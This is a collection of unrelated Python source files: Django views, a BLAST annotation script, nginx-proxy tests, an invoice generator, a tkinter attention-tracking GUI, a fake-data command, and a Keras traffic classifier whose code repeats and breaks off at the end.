if form.is_valid():
form.save()
messages.success(request, 'Your profile was successfully updated!')
return redirect('overview')
else:
messages.error(request, 'Please correct the error below.')
class PasswordChangeView(View):
def get(self, request):
if request.user.has_usable_password():
password_form = PasswordChangeForm
else:
password_form = AdminPasswordChangeForm
form = password_form(request.user)
return render(request, 'landing/password.html', {'form': form})
def post(self, request):
if request.user.has_usable_password():
password_form = PasswordChangeForm
else:
password_form = AdminPasswordChangeForm
if request.method == 'POST':
form = password_form(request.user, request.POST)
if form.is_valid():
form.save()
update_session_auth_hash(request, form.user)
messages.success(
request, 'Your password was successfully updated!')
return redirect('password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = password_form(request.user)
return render(request, 'landing/password.html', {'form': form})
def load_state(request):
regions = Region.objects.all().order_by('name')
return render(request, 'hr/region_list.html', {'regions': regions})
def load_city(request):
region = request.GET.get('state')
cities = City.objects.filter(region__id=region).order_by('name')
return render(request, 'hr/city_list.html', {'cities': cities})
def autocomplete(request):
if request.is_ajax():
query = request.GET.get('search')
queryset = City.objects.filter(name__istartswith=query)
suggestions = []
for i in queryset:
if len(suggestions) < 10:
suggestions.append(i.display_name)
data = {
'list': suggestions,
}
return JsonResponse(data)
|
StarcoderdataPython
|
3202917
|
<reponame>tomasMasson/SfMNPV_genomics
#!/usr/bin/env python3
import argparse
from Bio import SearchIO
def parse_blast_result(blast_xml):
'''
This script takes a blast output file in xml format and
returns a table displaying the query id, the best hit id
and the annotation retrieved from Entrez database
'''
# Results keep protein homologue from SfMNPV 3AP2, because it
# has a standarize identifier (YP_XXX or NP_XXX)
blast_handle = SearchIO.parse(blast_xml, 'blast-xml')
results = {}
for record in blast_handle:
hits = [hit.id for hit in record]
for hit in hits:
if 'NC_009011' in hit:
pseudoname = hit.split('prot_')[1]
hit_name = pseudoname.split('.')[0]
results[record.id] = hit_name
break
else:
pseudoname = hit.split('prot_')[1]
hit_name = pseudoname.split('.')[0]
results[record.id] = hit_name
return results
def fetch_annotations(blast_results, ref_file):
"""
Fetch protein annotations from a reference file
for the proteome of SfMNPV 3AP2.
"""
# Store reference annotations into a dictionary
with open(ref_file, 'r') as fh:
next(fh)
references = {line.split(",")[0]: line.split(",")[1]
for line in fh}
# Create annotation using reference records
annotation = {}
for record in blast_results:
for reference in references:
if blast_results[record] == reference:
annotation[record] = references[reference]
# annotation[record] = [reference, references[reference]]
return annotation
# def fetch_annotations(blast_results):
# '''
# Fetch Entrez annotations for each hit in a BLAST search.
# '''
#
# # BLAST hits annotation retrieval from NCBI Entrez using
# # the protein identifier from SfMNPV 3AP2
# Entrez.email = '<EMAIL>lp.edu.ar'
# queries = [query for query in blast_results.values()]
# entrez_search = Entrez.efetch('protein',
# id=queries,
# rettype='gb',
# retmode='text')
# search_handle = SeqIO.parse(entrez_search, 'gb')
# queries_annotation = {}
# for record in search_handle:
# queries_annotation[record.name] = record.description
#
# # Create annotation using BLAST records (proteins) and the
# # annotations retrieved from NCBI
# annotation = {}
# for record in blast_results:
# for query in queries_annotation:
# if blast_results[record] == query:
# annotation[record] = [query, queries_annotation[query]]
# return annotation
def get_features_table(raw_annotation):
'''
Convert a raw annotation into a feature table similar
to .gtf format.
'''
# Extract gene coordinates from fasta header and creates an
# unsorted feature table
unsorted_annotation = {}
for number, record in enumerate(raw_annotation):
name = number
start = int(record.split(':')[1]) + 1
end = int(record.split(':')[2]) + 1
# annotation = ' '.join(word for word in raw_annotation[record])
annotation = raw_annotation[record]
if end > start:
strand = '+'
unsorted_annotation[name] = [start, end, strand, annotation]
else:
strand = '-'
unsorted_annotation[name] = [end, start, strand, annotation]
# Sort feature table
sorted_table = {key: value for key, value in sorted(unsorted_annotation.items(), key=lambda item: item[1])}
# Create a dictionary with common protein names
# with open(protein_names, 'r') as f:
# names = {line.split()[0]: line.split()[1] for line in f}
# Print to standard output
for index, key in enumerate(sorted_table, 1):
data = sorted_table[key]
print(f'genome_assembly\tBLASTp\tCDS\t{data[0]}\t{data[1]}\t.\t{data[2]}\t0\t{data[3]}')
def argument_parser():
'''Command line argument parser.'''
parser = argparse.ArgumentParser()
parser.add_argument('blast',
help='input BLAST results file')
parser.add_argument('ref_file',
help='Reference names file')
args = parser.parse_args()
return args.blast, args.ref_file
def main():
raw_blast, referencies = argument_parser()
blast_results = parse_blast_result(raw_blast)
raw_annot = fetch_annotations(blast_results, referencies)
get_features_table(raw_annot)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3282912
|
import pytest
def test_custom_conf_does_not_apply_to_unknown_vhost(docker_compose, nginxproxy):
r = nginxproxy.get("http://nginx-proxy/")
assert r.status_code == 503
assert "X-test" not in r.headers
def test_custom_conf_applies_to_web1(docker_compose, nginxproxy):
r = nginxproxy.get("http://web1.nginx-proxy.local/port")
assert r.status_code == 200
assert r.text == "answer from port 81\n"
assert "X-test" in r.headers
assert "f00" == r.headers["X-test"]
def test_custom_conf_does_not_apply_to_web2(docker_compose, nginxproxy):
r = nginxproxy.get("http://web2.nginx-proxy.local/port")
assert r.status_code == 200
assert r.text == "answer from port 82\n"
assert "X-test" not in r.headers
def test_custom_block_is_present_in_nginx_generated_conf(docker_compose, nginxproxy):
assert "include /etc/nginx/vhost.d/web1.nginx-proxy.local_location;" in nginxproxy.get_conf()
|
StarcoderdataPython
|
1623217
|
<filename>main/invoice.py
from docx import Document
import translate
class Invoice():
def __init__(self, customer, owner):
self.customer = customer
self.owner = owner
name = self.customer.data["Name"].replace(" ", "").lower()
self.file_name = "../data/temp/%d%s.docx" % (self.customer.index, name)
self.template = Document("../data/invoice_template.docx")
self.add_charges(self.customer.charges)
self.replace_key_words()
self.template.save(self.file_name)
def replace_key_words(self):
for paragraph in self.template.paragraphs:
paragraph.text = self.translate(paragraph.text)
for table in self.template.tables:
for i in range(len(table.rows)):
for cell in table.row_cells(i):
for paragraph in cell.paragraphs:
paragraph.text = self.translate(paragraph.text)
def translate(self, text):
text = translate.translate(text, self.owner.data, self.customer.data)
return text
def add_charges(self, charge_dict):
charge_table = self.template.tables[1]
charges = charge_dict.copy()
for i in range(1, len(charge_table.rows) - 1):
try:
charge = charges.pop(0)
charge_total = float(charge[0]) * float(charge[2])
charge.append(charge_total)
except IndexError:
charge = ("", "", "", "")
cells = charge_table.row_cells(i)
qty = str(charge[0])
description = charge[1]
unit_price = charge[2]
total_charge = charge[3]
if unit_price != "":
unit_price = "${:0.2f}".format(unit_price)
total_charge = "${:0.2f}".format(total_charge)
cells[0].paragraphs[0].text = qty
cells[1].paragraphs[0].text = description
cells[2].paragraphs[0].text = unit_price
cells[3].paragraphs[0].text = total_charge
final_row = charge_table.row_cells(len(charge_table.rows) - 1)
final_row[3].paragraphs[0].text = "${:0.2f}".format(self.customer.total)
|
StarcoderdataPython
|
3266200
|
import os
import cv2
import time
import tkinter as tk
from tkinter import *
from tkinter import messagebox
from tkinter.ttk import *
import PIL.Image, PIL.ImageTk
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from src.attention_calculator import AttentionCalc
class App:
""""
Create our GUI app.
"""
def __init__(self, window, window_title, statistics, video_stream, weights):
""""
Creating the GUI for the app.
:param window: tk.Tk() object.
:param window_title: String - our GUI title.
:param statistics: a Statistics object.
:param video_stream: frameProvider object.
"""
# Initialize the attention weights
self.attention_calc = AttentionCalc(weights[0], weights[1], weights[2])
# Initialize exit flag
self.exit_flag = True
# Initialize face detection flag
self.face = False
# Root configuration
self.window = window
self.window.title(window_title)
self.window.configure(bg='white')
self.window.resizable(width=False, height=False)
# Extract video source size
self.vid = video_stream
self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)
self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
# Create a canvas that can fit the above video source size
self.canvas = tk.Canvas(window, width=self.width, height=self.height)
self.canvas.grid(row=0, column=0, columnspan=2, padx=5, pady=5)
# Face detection label
self.label_text = tk.StringVar()
self.label_text.set('')
self.face_detection_label = tk.Label(self.window, textvariable=self.label_text, bg='white').grid(row=1,
column=0,
columnspan=2,
padx=5,
pady=5)
# Create progress bars, progress text, labels and text box for create_progress_bars() function
self.attention_bar = None
self.valence_bar = None
self.arousal_bar = None
self.dominance_bar = None
self.attention_text = tk.StringVar()
self.valence_text = tk.StringVar()
self.arousal_text = tk.StringVar()
self.dominance_text = tk.StringVar()
self.attention_label = None
self.valence_label = None
self.arousal_label = None
self.dominance_label = None
self.text = tk.Text(window, height=5, width=45)
# After it is called once, the update method will be automatically called every delay milliseconds
self.delay = 1
self.photo = None
self.update()
# create progress bars
self.create_progress_bars(window)
# Create graph
self.statistics = statistics
self.add_charts()
self.figure = None
self.window.protocol("WM_DELETE_WINDOW", self.on_closing)
def start(self):
""""
Start our GUI loop (Thread).
"""
self.window.mainloop()
def on_closing(self):
"""
quit from program
"""
main_path = os.path.dirname(os.getcwd())
img_path = main_path + "\debug_exp\\frames\\frame.jpg"
inference_list_path = main_path + "\debug_exp\\results\\inference_list.txt"
if messagebox.askokcancel("Quit", "Do you want to quit?"):
self.exit_flag = False
self.figure.savefig("../public/img/graph.jpg", bbox_inches='tight')
self.statistics.save_to_pdf()
try:
os.remove(img_path)
os.remove(inference_list_path)
except FileNotFoundError:
pass
self.window.destroy()
exit(0)
def snapshot(self):
""""
# Get a frame from the video source
"""
ret, frame = self.vid.get_frame()
if ret:
cv2.imwrite("frame-" + time.strftime("%d-%m-%Y-%H-%M-%S") + ".jpg", cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
def update(self):
""""
Update our video streaming.
"""
# Get a frame from the video source
try:
frame = self.vid.get_frame()
except Exception as e:
if self.exit_flag:
raise e
else:
return
if self.face:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.label_text.set('')
else:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
text = 'Face not detected!'
self.label_text.set(text)
self.photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
self.canvas.create_image(0, 0, image=self.photo, anchor=tk.NW)
self.window.after(self.delay, self.update)
def update_emotion_textbox(self, newText):
""""
With every iteration, we update our emotions in our text box.
:param: newText - our new text for update.
"""
if not self.exit_flag:
return
self.text.config(state=NORMAL)
self.text.delete('1.0', END)
self.text.insert(tk.END, newText)
self.text.config(state=DISABLED)
def create_progress_bars(self, window):
""""
Configure the progress bars and all labels.
:param: window - tk.TK() object
"""
self.attention_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.valence_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.arousal_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.dominance_bar = Progressbar(window, orient=tk.HORIZONTAL,
length=300, mode='determinate', maximum=10, value=0)
self.attention_bar.grid(row=2, column=1, padx=5, pady=5)
self.valence_bar.grid(row=3, column=1, padx=5, pady=5)
self.arousal_bar.grid(row=4, column=1, padx=5, pady=5)
self.dominance_bar.grid(row=5, column=1, padx=5, pady=5)
self.attention_text.set('Attention (%0)')
self.valence_text.set('Valence (%0)')
self.arousal_text.set('Arousal (%0)')
self.dominance_text.set('Dominance (%0)')
self.attention_label = tk.Label(window, textvariable=self.attention_text, bg='white').grid(row=2, column=0,
padx=5, pady=5)
self.valence_label = tk.Label(window, textvariable=self.valence_text, bg='white').grid(row=3, column=0, padx=5,
pady=5)
self.arousal_label = tk.Label(window, textvariable=self.arousal_text, bg='white').grid(row=4, column=0, padx=5,
pady=5)
self.dominance_label = tk.Label(window, textvariable=self.dominance_text, bg='white').grid(row=5, column=0,
padx=5, pady=5)
self.text.insert(tk.END, "")
self.text.grid(row=2, column=2, rowspan=4, padx=5, pady=5)
self.text.config(state=DISABLED)
def add_charts(self):
"""
Adding attention levels chart to our gui.
"""
if not self.exit_flag:
return
self.figure = plt.Figure(figsize=(4, 4), dpi=100)
chart_type = FigureCanvasTkAgg(self.figure, self.window)
chart_type.get_tk_widget().grid(row=0, column=2, rowspan=4, padx=5, pady=5)
ax = self.figure.add_subplot(111)
ax.set_title('Attention tracking')
ax.set_ylim([0, 10])
data_frame = self.statistics.get_data_frame()
data_frame.plot(kind='line', legend=True, ax=ax)
def update_attention(self, value):
""""
Update Attention bar value.
:param: value - number.
"""
self.attention_bar['value'] = value
self.attention_text.set('Attention (%{:.2f})'.format(value * 10))
self.window.update_idletasks()
def update_valence(self, value):
""""
Update Valence bar value.
:param: value - number.
"""
self.valence_bar['value'] = value
self.valence_text.set('Valence (%{:.0f})'.format(value * 10))
self.window.update_idletasks()
def update_arousal(self, value):
""""
Update Arousal bar value.
:param: value - number.
"""
self.arousal_bar['value'] = value
self.arousal_text.set('Arousal (%{:.0f})'.format(value * 10))
self.window.update_idletasks()
def update_dominance(self, value):
""""
Update Dominance bar value.
:param: value - number.
"""
self.dominance_bar['value'] = value
self.dominance_text.set('Dominance (%{:.0f})'.format(value * 10))
self.window.update_idletasks()
def attention_bar_calc(self, results):
"""
Calculate the Attention level of the subject
:param results: the results from the ANN model
:return: the attention level
"""
return self.attention_calc.attention_calc(results)
|
StarcoderdataPython
|
1730439
|
import random
from django.contrib.gis.geos import GEOSGeometry
from django.core.management import BaseCommand
from django_dynamic_fixture import G
from fleetassignment.vehicles.models import Vehicle, VehiclePosition
class Command(BaseCommand):
help = "This command is responsible for generating fake Vehicles data"
def handle(self, *args, **options):
for plate in range(3):
for vehicle in range(random.randint(1, 50)):
_vehicle = G(Vehicle, plate_number=plate)
for position in range(random.randint(1, 10)):
lat = random.uniform(10.00, 1000.00)
lon = random.uniform(10.00, 1000.00)
G(
VehiclePosition,
vehicle=_vehicle,
lat=lat,
lon=lon,
point=GEOSGeometry(f'POINT({lat} {lon})')
)
|
StarcoderdataPython
|
1610179
|
<gh_stars>1-10
# from __future__ import absolute_import, division, print_function, unicode_literals
# 导入TensorFlow和tf.keras
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
import tensorflow as tf
from tensorflow import keras
from keras import initializers
from keras import optimizers
from keras.callbacks import *
from keras.models import Sequential, load_model
from keras.layers import Conv2D, LSTM, Flatten, Dense, Activation, BatchNormalization, Dropout, Reshape, MaxPooling2D
from keras.callbacks import LearningRateScheduler, TensorBoard, ModelCheckpoint, ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l1, l2
from keras.utils import multi_gpu_model
# from networks.train_plot import PlotLearning
# from __future__ import absolute_import, division, print_function, unicode_literals
# 导入TensorFlow和tf.keras
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
import tensorflow as tf
from tensorflow import keras
from keras import initializers
from keras import optimizers
from keras.callbacks import *
from keras.models import Sequential, load_model
from keras.layers import Conv2D, LSTM, Flatten, Dense, Activation, BatchNormalization, Dropout, Reshape, MaxPooling2D
from keras.callbacks import LearningRateScheduler, TensorBoard, ModelCheckpoint, ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l1, l2
from keras.utils import multi_gpu_model
# from networks.train_plot import PlotLearning
# 导入辅助库
import numpy as np
import matplotlib.pyplot as plt
import datetime
# 检验tensorflow版本
print(tf.__version__)
def mkdir(path):
# 引入模块
import os
# 去除首位空格
path = path.strip()
# 去除尾部 \ 符号
path = path.rstrip("\\")
# 判断路径是否存在
# 存在 True
# 不存在 False
isExists = os.path.exists(path)
# 判断结果
if not isExists:
# 如果不存在则创建目录
# 创建目录操作函数
os.makedirs(path)
print(path + ' 创建成功')
return True
else:
# 如果目录存在则不创建,并提示目录已存在
print(path + ' 目录已存在')
return False
class ParallelModelCheckpoint(ModelCheckpoint):
def __init__(self, model, filepath, monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=False,
mode='auto', period=1):
self.single_model = model
super(ParallelModelCheckpoint, self).__init__(filepath, monitor, verbose, save_best_only, save_weights_only,
mode, period)
def set_model(self, model):
super(ParallelModelCheckpoint, self).set_model(self.single_model)
class LR_Updater(Callback):
'''This callback is utilized to log learning rates every iteration (batch cycle)
it is not meant to be directly used as a callback but extended by other callbacks
ie. LR_Cycle
'''
def __init__(self, iterations):
'''
iterations = dataset size / batch size
epochs = pass through full training dataset
'''
self.epoch_iterations = iterations
self.trn_iterations = 0.
self.history = {}
def on_train_begin(self, logs={}):
self.trn_iterations = 0.
logs = logs or {}
def on_batch_end(self, batch, logs=None):
logs = logs or {}
self.trn_iterations += 1
K.set_value(self.model.optimizer.lr, self.setRate())
self.history.setdefault('lr', []).append(K.get_value(self.model.optimizer.lr))
self.history.setdefault('iterations', []).append(self.trn_iterations)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
def plot_lr(self):
plt.xlabel("iterations")
plt.ylabel("learning rate")
plt.plot(self.history['iterations'], self.history['lr'])
def plot(self, n_skip=10):
plt.xlabel("learning rate (log scale)")
plt.ylabel("loss")
plt.plot(self.history['lr'], self.history['loss'])
plt.xscale('log')
class LR_Cycle(LR_Updater):
'''This callback is utilized to implement cyclical learning rates
it is based on this pytorch implementation https://github.com/fastai/fastai/blob/master/fastai
and adopted from this keras implementation https://github.com/bckenstler/CLR
'''
def __init__(self, iterations, cycle_mult=1):
'''
iterations = dataset size / batch size
iterations = number of iterations in one annealing cycle
cycle_mult = used to increase the cycle length cycle_mult times after every cycle
for example: cycle_mult = 2 doubles the length of the cycle at the end of each cy$
'''
self.min_lr = 0
self.cycle_mult = cycle_mult
self.cycle_iterations = 0.
super().__init__(iterations)
def setRate(self):
self.cycle_iterations += 1
if self.cycle_iterations == self.epoch_iterations:
print(self.epoch_iterations, 'change')
self.cycle_iterations = 0.
self.epoch_iterations *= self.cycle_mult
cos_out = np.cos(np.pi * (self.cycle_iterations) / self.epoch_iterations) + 1
if (self.cycle_iterations % 10) == 0:
print(self.max_lr / 2 * cos_out)
# print(self.epoch_iterations)
# print(np.pi * (self.cycle_iterations) / self.epoch_iterations)
# print(self.cycle_iterations,'iters')
# print(cos_out)
# print(self.max_lr / 2 * cos_out,'begin')
return self.max_lr / 2 * cos_out
def on_train_begin(self, logs={}):
super().on_train_begin(logs={}) # changed to {} to fix plots after going from 1 to mult. lr
self.cycle_iterations = 0.
self.max_lr = K.get_value(self.model.optimizer.lr)
# HAPPY
class DFR_model:
def __init__(self, epochs=100000, batch_size=512, load_weights=True):
self.name = 'DFR'
self.model_filename = './DFR.h5'
self.num_classes = 8
self.input_shape = [28, 28, 1]
self.epochs = epochs #
self.batch_size = batch_size #
self.weight_decay = 0.0001
self.log_filepath = r'./DFR_tensorboard/'
self.conv_l1_regularizer = 0.00045#
# self.lstm_l1_regularizer = 0.0003 #
self.start_lr = 0.001 #
self.end_lr = 0.000001 #
self.patience = 50 #
self.epoch_1 = 1
self.epoch_2 = 2
self.epoch_3 = 3
self.lr_1 = 0.001
self.lr_2 = 0.001
self.lr_3 = 0.001#0.55 0.5 0.475 0.04625 0.45 0. 4375 0.4
if load_weights:
try:
self._model = load_model(self.model_filename)
print('Successfully loaded', self.name)
except (ImportError, ValueError, OSError) as e:
print(e)
print('Failed to load', self.name)
def count_params(self):
return self._model.count_params()
def build_model(self):
# self.batch_size = self.batch_size * strategy.num_replicas_in_sync
# with strategy.scope():
model = Sequential([
# # FLATTEN Finishedsparse_
Reshape((-1, 784, 1), input_shape=self.input_shape),
#
# # CONV 1 Finished
Conv2D(32, (1, 25,), padding='SAME', strides=[1, 1, ],
kernel_initializer=initializers.random_normal(stddev=0.1),
kernel_regularizer=l1(self.conv_l1_regularizer)),
# BatchNormalization(),
# Dropout(0.5),
Activation('relu'),
MaxPooling2D((1, 3), strides=(1, 3), padding='SAME'),
#
# # CONV 2 Finished
Conv2D(64, (1, 25,), padding='SAME', strides=[1, 1, ],
kernel_initializer=initializers.random_normal(stddev=0.1),
kernel_regularizer=l1(self.conv_l1_regularizer)),
# BatchNormalization(),
# Dropout(0.5),
Activation('relu'),
MaxPooling2D((1, 3), strides=(1, 3), padding='SAME'),
#
# # DENSE 1 / Dropout Finished
Flatten(),
Dense(1024, activation='relu',kernel_initializer=initializers.random_normal(stddev=0.1)),
BatchNormalization(),
Dropout(0.2),
# Dropout(0.5),
# DENSE 2 / SOFTMAX Finished
# Dense(100, activation='relu', kernel_initializer=initializers.random_normal(stddev=0.01)),
# Flatten(),
Dense(8, activation='softmax', kernel_initializer=initializers.random_normal(stddev=0.1)),
])
adam = optimizers.Adam(lr=self.start_lr, beta_1=0.9, beta_2=0.999, ) # 7.28增大10 times训练步长
model.compile(optimizer=adam,
loss='categorical_crossentropy',
metrics=['accuracy'])
# sparse_
return model
def scheduler(self, epoch):
# print(epoch, '--------------------------')
if epoch <= self.epoch_1:
return self.lr_1
if epoch <= self.epoch_2:
return self.lr_2
if epoch <= self.epoch_3:
return self.lr_3
return self.lr_3
def train(self):
data_path = '/home/ailab/YI ZENG/Research/Classified/tra/DTrafficR/2_FusionedDataset/Numpy/data_norm8CLS_ALL.npy'
label_path = '/home/ailab/YI ZENG/Research/Classified/tra/DTrafficR/2_FusionedDataset/Numpy/label_norm8CLS_ALL.npy'
data = np.load(data_path)
data = data.reshape([-1, 28, 28, 1])
label_n = np.load(label_path)
print('data的数量', data.shape)
print('label的数量', label_n.shape)
print(label_n[1:10])
print("label的格式为:", type(label_n))
x_train = data[:12417]
y_train = label_n[:12417]
x_test = data[12417:]
y_test = label_n[12417:]
# 数据归一化到【0:255】
x_test = x_test * 256
self.x_test = x_test.astype(int)
x_train = x_train * 256
self.x_train = x_train.astype(int)
y_train = keras.utils.to_categorical(y_train, self.num_classes)
y_test = keras.utils.to_categorical(y_test, self.num_classes)
self.y_test = y_test.astype(int)
self.y_train = y_train.astype(int)
# 模型
model = self.build_model()
model.summary()
# 参数文件夹保存
mkdir(self.model_filename + 'date_' + datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
# 训练
change_lr = LearningRateScheduler(self.scheduler)
checkpoint = ModelCheckpoint(
self.model_filename + 'date_' + datetime.datetime.now().strftime(
"%Y%m%d-%H%M%S") + '/' + 'epoch_' + '{epoch:02d}' + '_val_acc_' + '{val_acc:.4f}' + '.h5',
monitor='val_acc',
verbose=0,
save_best_only=True,
mode='auto',
period=5)
# plot_callback = PlotLearning()
tb_cb = TensorBoard(
log_dir=self.log_filepath + 'date_' + datetime.datetime.now().strftime(
"%Y%m%d-%H%M%S") + '_conv_l1_' + str(self.conv_l1_regularizer) + '_lstm_l1_' + str(
self.conv_l1_regularizer),
histogram_freq=0)
# lr change
reduce_lr = ReduceLROnPlateau(monitor='val_acc', factor=0.5, verbose=1,
patience=self.patience, min_lr=self.end_lr)
# SGDR_lr = LR_Cycle(5000, 2)
cbks = [checkpoint, tb_cb, reduce_lr]
print('Using real-time data augmentation.')
# datagen = ImageDataGenerator(horizontal_flip=False,
# width_shift_range=0.01, height_shift_range=0.01, fill_mode='constant', cval=0.)
#
# datagen.fit(x_train)
# start traing
# model.fit_generator(datagen.flow(x_train, y_train,batch_size=self.batch_size),
# steps_per_epoch=59,
# verbose=2,
# epochs=self.epochs,
# callbacks=cbks,
# validation_data=(x_test, y_test))
# start traing
model.fit(x=self.x_train, y=self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
callbacks=cbks,
verbose=2,
validation_data=(self.x_test, self.y_test),
)
# save model
model.save(self.model_filename + '.h5')
self._model = model
def predict(self, img):
return self._model.predict(img, batch_size=self.batch_size)
def predict_one(self, img):
return self.predict(img)[0]
def accuracy(self):
return self._model.evaluate(self.x_test, self.y_test, verbose=0)[1]
if __name__ == '__main__':
DFR = DFR_model()
DFR.train()
print(DFR.accuracy())
# best(val_acc:97): 0。003 0。001 0.000001/
# goaled: 0.01 0.0005 0.0000001/0.003 0.003 0.000001/0。01 0。005 /0。003 0。001 0.000001/0.001 0.00013 0.0001
# failed: 0.01 0.001 0.000001/
# 导入辅助库
import numpy as np
import matplotlib.pyplot as plt
import datetime
# 检验tensorflow版本
print(tf.__version__)
def mkdir(path):
# 引入模块
import os
# 去除首位空格
path = path.strip()
# 去除尾部 \ 符号
path = path.rstrip("\\")
# 判断路径是否存在
# 存在 True
# 不存在 False
isExists = os.path.exists(path)
# 判断结果
if not isExists:
# 如果不存在则创建目录
# 创建目录操作函数
os.makedirs(path)
print(path + ' 创建成功')
return True
else:
# 如果目录存在则不创建,并提示目录已存在
print(path + ' 目录已存在')
return False
class ParallelModelCheckpoint(ModelCheckpoint):
def __init__(self, model, filepath, monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=False,
mode='auto', period=1):
self.single_model = model
super(ParallelModelCheckpoint, self).__init__(filepath, monitor, verbose, save_best_only, save_weights_only,
mode, period)
def set_model(self, model):
super(ParallelModelCheckpoint, self).set_model(self.single_model)
class LR_Updater(Callback):
'''This callback is utilized to log learning rates every iteration (batch cycle)
it is not meant to be directly used as a callback but extended by other callbacks
ie. LR_Cycle
'''
def __init__(self, iterations):
'''
iterations = dataset size / batch size
epochs = pass through full training dataset
'''
self.epoch_iterations = iterations
self.trn_iterations = 0.
self.history = {}
def on_train_begin(self, logs={}):
self.trn_iterations = 0.
logs = logs or {}
def on_batch_end(self, batch, logs=None):
logs = logs or {}
self.trn_iterations += 1
K.set_value(self.model.optimizer.lr, self.setRate())
self.history.setdefault('lr', []).append(K.get_value(self.model.optimizer.lr))
self.history.setdefault('iterations', []).append(self.trn_iterations)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
def plot_lr(self):
plt.xlabel("iterations")
plt.ylabel("learning rate")
plt.plot(self.history['iterations'], self.history['lr'])
def plot(self, n_skip=10):
plt.xlabel("learning rate (log scale)")
plt.ylabel("loss")
plt.plot(self.history['lr'], self.history['loss'])
plt.xscale('log')
class LR_Cycle(LR_Updater):
'''This callback is utilized to implement cyclical learning rates
it is based on this pytorch implementation https://github.com/fastai/fastai/blob/master/fastai
and adopted from this keras implementation https://github.com/bckenstler/CLR
'''
def __init__(self, iterations, cycle_mult=1):
'''
iterations = dataset size / batch size
iterations = number of iterations in one annealing cycle
cycle_mult = used to increase the cycle length cycle_mult times after every cycle
for example: cycle_mult = 2 doubles the length of the cycle at the end of each cy$
'''
self.min_lr = 0
self.cycle_mult = cycle_mult
self.cycle_iterations = 0.
super().__init__(iterations)
def setRate(self):
self.cycle_iterations += 1
if self.cycle_iterations == self.epoch_iterations:
print(self.epoch_iterations, 'change')
self.cycle_iterations = 0.
self.epoch_iterations *= self.cycle_mult
cos_out = np.cos(np.pi * (self.cycle_iterations) / self.epoch_iterations) + 1
if (self.cycle_iterations % 10) == 0:
print(self.max_lr / 2 * cos_out)
# print(self.epoch_iterations)
# print(np.pi * (self.cycle_iterations) / self.epoch_iterations)
# print(self.cycle_iterations,'iters')
# print(cos_out)
# print(self.max_lr / 2 * cos_out,'begin')
return self.max_lr / 2 * cos_out
def on_train_begin(self, logs={}):
super().on_train_begin(logs={}) # changed to {} to fix plots after going from 1 to mult. lr
self.cycle_iterations = 0.
self.max_lr = K.get_value(self.model.optimizer.lr)
# HAPPY
class DFR_model:
def __init__(self, epochs=100000, batch_size=512, load_weights=True):
self.name = 'DFR'
self.model_filename = './DFR.h5'
self.num_classes = 8
self.input_shape = [28, 28, 1]
self.epochs = epochs #
self.batch_size = batch_size #
self.weight_decay = 0.0001
self.log_filepath = r'./DFR_tensorboard/'
self.conv_l1_regularizer = 0.00045#
# self.lstm_l1_regularizer = 0.0003 #
self.start_lr = 0.001 #
self.end_lr = 0.000001 #
self.patience = 50 #
self.epoch_1 = 1
self.epoch_2 = 2
self.epoch_3 = 3
self.lr_1 = 0.001
self.lr_2 = 0.001
self.lr_3 = 0.001#0.55 0.5 0.475 0.04625 0.45 0. 4375 0.4
if load_weights:
try:
self._model = load_model(self.model_filename)
print('Successfully loaded', self.name)
except (ImportError, ValueError, OSError) as e:
print(e)
print('Failed to load', self.name)
def count_params(self):
return self._model.count_params()
def build_model(self):
# self.batch_size = self.batch_size * strategy.num_replicas_in_sync
# with strategy.scope():
model = Sequential([
# # FLATTEN Finishedsparse_
Reshape((-1, 784, 1), input_shape=self.input_shape),
#
# # CONV 1 Finished
Conv2D(32, (1, 25,), padding='SAME', strides=[1, 1, ],
kernel_initializer=initializers.random_normal(stddev=0.1),
kernel_regularizer=l1(self.conv_l1_regularizer)),
# BatchNormalization(),
# Dropout(0.5),
Activation('relu'),
MaxPooling2D((1, 3), strides=(1, 3), padding='SAME'),
#
# # CONV 2 Finished
Conv2D(64, (1, 25,), padding='SAME', strides=[1, 1, ],
kernel_initializer=initializers.random_normal(stddev=0.1),
kernel_regularizer=l1(self.conv_l1_regularizer)),
# BatchNormalization(),
# Dropout(0.5),
Activation('relu'),
MaxPooling2D((1, 3), strides=(1, 3), padding='SAME'),
#
# # DENSE 1 / Dropout Finished
Flatten(),
Dense(1024, activation='relu',kernel_initializer=initializers.random_normal(stddev=0.1)),
BatchNormalization(),
Dropout(0.2),
# Dropout(0.5),
# DENSE 2 / SOFTMAX Finished
# Dense(100, activation='relu', kernel_initializer=initializers.random_normal(stddev=0.01)),
# Flatten(),
Dense(8, activation='softmax', kernel_initializer=initializers.random_normal(stddev=0.1)),
])
adam = optimizers.Adam(lr=self.start_lr, beta_1=0.9, beta_2=0.999, ) # 7.28增大10 times训练步长
model.compile(optimizer=adam,
loss='categorical_crossentropy',
metrics=['accuracy'])
# sparse_
return model
def scheduler(self, epoch):
# print(epoch, '--------------------------')
if epoch <= self.epoch_1:
return self.lr_1
if epoch <= self.epoch_2:
return self.lr_2
if epoch <= self.epoch_3:
return self.lr_3
return self.lr_3
def train(self):
data_path = '/home/ailab/YI ZENG/Research/Classified/tra/DTrafficR/2_FusionedDataset/Numpy/data_norm8CLS_ALL.npy'
